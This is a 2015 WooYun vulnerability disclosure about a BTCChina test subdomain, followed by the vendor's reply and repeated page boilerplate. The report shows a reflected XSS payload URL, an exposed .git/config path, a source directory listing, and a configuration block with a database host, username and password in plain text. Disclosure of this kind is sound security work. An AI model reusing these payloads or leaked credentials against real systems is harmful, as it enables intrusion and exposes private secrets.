比特币中国某站代码泄漏+数据库密码泄漏+xss | wooyun-2015-0133852

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0133852

漏洞标题：

比特币中国某站代码泄漏+数据库密码泄漏+xss

漏洞详情

披露状态：

2015-08-13：细节已通知厂商并且等待厂商处理中
2015-08-13：厂商已经确认，细节仅向厂商公开
2015-08-13：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

偶然发现

详细说明：

http://home.eval.btcchina.com/?searchterms=angelina"><img src=1 onerror=alert(1)>

http://passport.eval.btcchina.com/.git/config

-rw-r--r--   1 root  staff    167  8 13 11:09 .gitignore
-rw-r--r--   1 root  staff   1432  8 13 11:09 READ_ME
drwxr-xr-x   6 root  staff    204  8 13 11:13 admin
drwxr-xr-x   5 root  staff    170  8 13 11:15 catalog
drwxr-xr-x   4 root  staff    136  8 13 11:17 configs
drwxr-xr-x   3 root  staff    102  8 13 11:18 db
-rw-r--r--   1 root  staff   2038  8 13 11:18 gruntfile.js
-rw-r--r--   1 root  staff  10680  8 13 11:19 index.php
-rw-r--r--   1 root  staff    275  8 13 11:19 package.json
-rw-r--r--   1 root  staff   1987  8 13 11:19 pagespeed.sh
-rw-r--r--   1 root  staff    685  8 13 11:19 prod_deployment.sh
-rw-r--r--   1 root  staff    699  8 13 11:19 prod_revert.sh
drwxr-xr-x   3 root  staff    102  8 13 11:23 system

define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'vmshpdpd01.cl6bwsixaww2.ap-southeast-1.rds.amazonaws.com');
define('DB_USERNAME', 'shp_adm');
define('DB_PASSWORD', 'shp123$$');
define('DB_DATABASE', 'shpprd');
define('DB_PORT', '1561');
define('DB_PREFIX', '');

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-08-13 14:57

厂商回复：

感谢提醒。由于没有及时更新dns设置，，这两个内部测试用域名。指向了旧的ip地址，该地址已经不为我司使用。这两个域名指向了其它网站。虽然不会导致我司的代码和数据库泄露，但是可能会引起cookie泄露等问题而导致其它安全隐患。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云